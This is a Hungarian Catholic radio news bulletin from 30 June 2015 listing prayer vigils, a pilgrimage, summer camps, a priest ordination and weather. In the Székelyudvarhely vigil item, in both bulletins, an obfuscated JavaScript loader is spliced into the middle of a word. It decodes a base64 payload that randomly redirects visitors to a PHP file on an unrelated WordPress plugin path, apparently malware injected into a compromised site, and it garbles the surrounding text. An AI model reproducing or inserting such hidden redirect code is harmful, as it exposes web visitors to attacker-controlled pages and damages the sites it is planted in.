2015. június 30. – Hírek és programajánló

H Í R E K   E S T E
Szerdai pár-beszéd Marosvásárhelyen
Holnap Marosvásárhelyen a Szerdai párbeszédek nyolcadik alkalma következik. Témája: Itt a nyár: bekapcsolódunk vagy kikapcsolódunk? Meghívottak: Albert Csilla pedagógus, Bakó Mária lelkigondozó, Becsky Borbála pszichoterapeuta és Samaj Imola élménypedagógus. A Szerdai párbeszédek program célja a család, a házasság erősítése, a lelki egészség védelme. A párkapcsolati témák mellett a még, vagy már nem házasságban élőkhöz, fiatalokhoz vagy egyedülállókhoz is szól. A meghívott szakemberek az adott témában felvezetőket tartanak, ezt  követően közös beszélgetésre hívják az érdeklődőket szerdán, este hét órára az Ama Deus cukrászdába.

Engesztelő imavirrasztás Székelyudvarhelyen
A Mária Rádió székelyudvarhelyi kápolnájában minden hónap első szerdáján egész éjjel virrasztást tartanak, tizenegy órától szentmisét mutatnak be. Az engesztelő imavirrasztásra hívnak együtt imádkozni mindenkit, aki Jézussal szeretne időt tölteni. A virrasztást városukért, egyházközségeikért, a fiatalok testi-lelki tisztaságáért, a családokért, egyedülállókért, a jegyesekért, gyermeket vágyó és váró szülőkért, betegekért, elhunyt szeretteikért, saját magukért és egyéni szándékokra ajánlják az udvarhelyiek. A kápolnában ugyanakkor minden reggel nyolc órától este nyolc óráig állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó, egész napos szentségimádás van Várják az Istent imádni, engesztelni vágyókat.

Sarlós Boldogasszony-napi zarándoklat Futásfalván
Július 2-án Háromszék egyik leghíresebb búcsúját Sarlós Boldogasszony napján tartják Futásfalván. A Szent András tiszteletére felszentelt templomban a bevezető szentmise szerdán este nyolc órakor kezdődik, melyet egész éjszakai virrasztás követ. A híveknek csütürtökön reggel nyolc órától gyónási lehetőségük lesz. A zarándokok, keresztalják fogadása után, délelőtt tizenegy órától az ünnepi szentmise veszi kezdetét, amelyen megemlékeznek dr. Jáky Teodóz Sándor győri bencés paptanárról, aki a népviseletbe öltözött moldvai csángó magyarokat sokszor elhozta erre a búcsúra, valamint Bálint Lajos egykori érsekre, aki évekig volt pásztora az itt élőknek. A környékbeli papság koncelebrálásával tartott szentmisén jelen lesz Tamás József segédpüspök is. A szertartás után sor kerül az ünnepélyes körmenetre, melyet a tavalyihoz hasonlóan a falu központjában tartanak meg, majd főpapi áldás és himnuszok zárják a huszonharmadik fogadalmi búcsút.

Elsőcsütörtöki szentségimádás
Alsódobóban, az Isteni Irgalmasság kápolnájában minden hónap elsőcsütörtökén,  szentségimádást tartanak délután négy órától. Este hét órakor szentmisével zárják az imaalkalmat. A szentségimádást a rózsafüzércsoportok és a rózsafüzér gyerek-focicsapat vezeti.

Assisi Szent Ferenc iskolája Csíksomlyón
Az erdélyi ferencesek ebben az évben is megszervezik az Assisi Szent Ferenc iskolája nevű tábort a csíksomlyói kolostorban, július 9-12. között, IV-VIII. osztályos tanulók részére. Jelentkezni a plébániai hivatalokban.

Vigyél le életem forrásához
Személyesen kísért, szentignáci lelkigyakorlatra hívnak a Segítő nővérek július 11-18. között. Egy hét teljes csendben, személyes kísérettel, impulzusokkal, elmélkedésekkel, test és lélek imájával. Kísérők: Bereczki Silvia és Darvas Piroska. Helyszín: a csíkszentdomokosi Szent Margit Lelkigyakorlatos Ház.  Jelentkezni július 3-áig lehet a bereczki.silvia@segitonoverek.info vagy darvas.piroska@yahoo.com –email címeken.

Családos tábor nyolcadszor
A gyermekek állnak majd a beszélgetések középpontjában a nyolcadik alkalommal megrendezésre kerülő Egyházmegyei Családos Táborban. "Szemünk fénye - a gyermek" témával tartják idén, augusztus 20. és 23-a között Erdődhegyen az immár nyolcadik alkalommal megvalósuló Szatmári Egyházmegyei Családos Tábort. A programban a második naptól szerepelnek azok az előadások, amelyek a tábor során a gyermekek minél jobb megismerését és megértését segítik a szülők számára: Ft. Czier István mezőfényi plébános, Gyermekeink lelki élete; Bálint Katalin pszichológus, A mesék ereje gyermekeinkben; Fülöp Orsolya pszichológus, Mi történik a gyermekemmel és hogyan segíthetek neki?; Gnándt Gábor szociálpedagógus, Kisgyermekek készségeinek fejlesztése a játék által. Az előadások mellett szintén a téma elmélyítését segíti a műhelymunka, de lesz alkalom a kikapcsolódásra, önfeledt szórakozásra.
A táborozni vágyó családokat kérik, hogy augusztus 10-éig jelentkezzenek a szervező Szatmári Római Katolikus Püspökség világiak irodája vi@szatmariegyhazmegye.ro emailcímen, vagy Lepedus István családreferensnél, a 0740115464-es telefonszámon.

Különleges tábor a legszínesebbeknek
Aki azt hiszi, hogy a fogyatékkal élők nem tudnak szórakozni, az nem látta még őket táborozni. A Gyulafehérvári Caritas Fogyatékkal élőket támogató programja idén kilencedik alkalommal szervez különleges nyári tábort a fogyatékkal élők és gondozóik számára június 28 - július 3. között, keretet biztosítva ezáltal az egymással való ismerkedésre, a szabadságra, a mindennapokból való kiszabadulásra. Az idei táborozók társasága minden szempontból sokszínű, hiszen a 144 résztvevő Hargita és Kovászna megye több mint 20 településéről érkezik, a Gyulafehérvári Caritas Őrangyal, Utazó gyógypedagógus programjait, vagy a Szülők támogató csoportját látogatják rendszeresen, és sokfélék fogyatékosság típusának tekintetében is. A szervezők feltett szándéka, hogy a sokszínű csapat minden tagja találjon számára megfelelő szórakozást, és szép élményekkel gazdagodva, vidáman térjen haza.

Az időjárásról: Még tart a borongós, esős idő. Szerdán már számíthatunk napsütésre, főleg az ország nyugati részén. Az erdélyi medencében továbbra is záporok és zivatarok lesznek jellemzőek. Helyenként mekélénkül a szél. Pár fokkal melegebb lesz a levegő hőmérséklete, napközben elérve a 23-29 C fokot is.

MRE - Hírszolgálat, 2015. június 30.


H Í R E K   R E G G E L / D É L B E N

Papszentelés volt Gyulafehérváron
A tegnap délelőtt Szt. Péter és Pál főapoastolok ünnepén Jakubinyi György érsek öt diakónust szentelt pappá: a székelyudvarhelyi Benedek Róbert-Károlyt, a búzásbesenyői Lőrincz Barnabást, a csíkdelnei Obermájer Ervin-Istvánt, a ditrói Simon Imrét és a lövétei Tódor Attilát. Az újmisések egyben kinevezéseiket is megkapták első szolgálati helyeikre: Benedek Róbert Károly - Sepsiszentgyörgy, Krisztus Király plébánia. Lőrincz Barnabás – Gyergyócsomafalva. Obermájer Ervin - Marosvásárhely-belváors. Simon Imre – Segesvár és Tódor Attila - Csíkszereda, Szent Kereszt plébániákra kaptak kihelyezést.

Szerdai pár-beszéd Marosvásárhelyen
Július 1-én, Marosvásárhelyen a Szerdai párbeszédek nyolcadik alkalma következik. Témája: Itt a nyár: bekapcsolódunk vagy kikapcsolódunk? Meghívottak: Albert Csilla pedagógus, Bakó Mária lelkigondozó, Becsky Borbála pszichoterapeuta és Samaj Imola élménypedagógus. A Szerdai párbeszédek program célja a család, a házasság erősítése, a lelki egészség védelme. A párkapcsolati témák mellett a még, vagy már nem házasságban élőkhöz, fiatalokhoz vagy egyedülállókhoz is szól. A meghívott szakemberek az adott témában felvezetőket tartanak, ezt  követően közös beszélgetésre hívják az érdeklődőket szerdán, este hét órára az Ama Deus cukrászdába.

Engesztelő imavirrasztás Székelyudvarhelyen
A Mária Rádió székelyudvarhelyi kápolnájában minden hónap első szerdáján egész éjjel virrasztást tartanak, tizenegy órától szentmisét mutatnak be. Az engesztelő imavirrasztásra hívnak együtt imádkozni mindenkit, aki Jézussal szeretne időt tölteni. A virrasztást városukért, egyházközségeikért, a fiatalok testi-lelki tisztaságáért, a családokért, egyedülállókért, a jegyesekért, gyermeket vágyó és váró szülőkért, betegekért, elhunyt szeretteikért, saját magukért és egyéni szándékokra ajánlják az udvarhelyiek. A kápolnában ugyanakkor minden reggel nyolc órától este nyolc óráig állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó, egész napos szentségimádás van Várják az Istent imádni, engesztelni vágyókat.

Sarlós Boldogasszony-napi zarándoklat Futásfalván
Július 2-án Háromszék egyik leghíresebb búcsúját Sarlós Boldogasszony napján tartják Futásfalván. A Szent András tiszteletére felszentelt templomban a bevezető szentmise szerdán este nyolc órakor kezdődik, melyet egész éjszakai virrasztás követ. A híveknek csütürtökön reggel nyolc órától gyónási lehetőségük lesz. A zarándokok, keresztalják fogadása után, tizenegy órától az ünnepi szentmise veszi kezdetét, amelyen megemlékeznek dr. Jáky Teodóz Sándor győri bencés paptanárról, aki a népviseletbe öltözött moldvai csángó magyarokat sokszor elhozta erre a búcsúra, valamint Bálint Lajos érsekre, aki évekig volt pásztora az itt élőknek. A környékbeli papság koncelebrálásával tartott szentmisén jelen lesz Tamás József segédpüspök is. A szertartás után sor kerül az ünnepélyes körmenetre, melyet a tavalyihoz hasonlóan a falu központjában tartanak meg, majd főpapi áldás és himnuszok zárják a huszonharmadik fogadalmi búcsút.

Elsőcsütörtöki szentségimádás
Alsódobóban, az Isteni Irgalmasság kápolnájában minden hónap elsőcsütörtökén,  szentségimádást tartanak délután négy órától. Este hét órakor szentmisével zárják az imaalkalmat. A szentségimádást a rózsafüzércsoportok és a rózsafüzér gyerek-focicsapat vezeti.

Lelkigyakorlat szenvedélybetegeknek és hozzátartozóinak
A Gyulafehérvári Caritas - KI-ÚT konzultációs program keretében, lelkigyakorlatot szervez szenvedélybetegeknek és hozzátartozóiknak Gyergyószentmiklóson, július 2-5 között. A lelkigyakorlat alapja az elfogadás és a  megértés, amely lehetőséget ad az őszinte beszélgetésekre. Érdeklődni és jelentkezni lehet még ma a 0731 137 191 telefonszámon.

Assisi Szent Ferenc iskolája Csíksomlyón
Az erdélyi ferencesek ebben az évben is megszervezik az Assisi Szent Ferenc iskolája nevű tábort a csíksomlyói kolostorban, július 9-12. között, IV-VIII. osztályos tanulók részére. Jelentkezni a plébániai hivataloknál.

Vigyél le életem forrásához
Személyesen kísért, szentignáci lelkigyakorlatra hívnak a Segítő nővérek július 11-18. között. Egy hét teljes csendben, személyes kísérettel, impulzusokkal, elmélkedésekkel, test és lélek imájával. Kísérők: Bereczki Silvia és Darvas Piroska. Helyszín: a csíkszentdomokosi Szent Margit Lelkigyakorlatos Ház.  Jelentkezni július 3-áig lehet a bereczki.silvia@segitonoverek.info vagy darvas.piroska@yahoo.com –email címeken.

Az időjárásról: Még tart a borongós, esős idő. Országszerte számíthatunk zápor, helyenként zivatar kialakulására. Ma napközben 22-27 C fok váható.

MRE - Hírszolgálat, 2015. június 30.

About the author

maradmin

Leave a Comment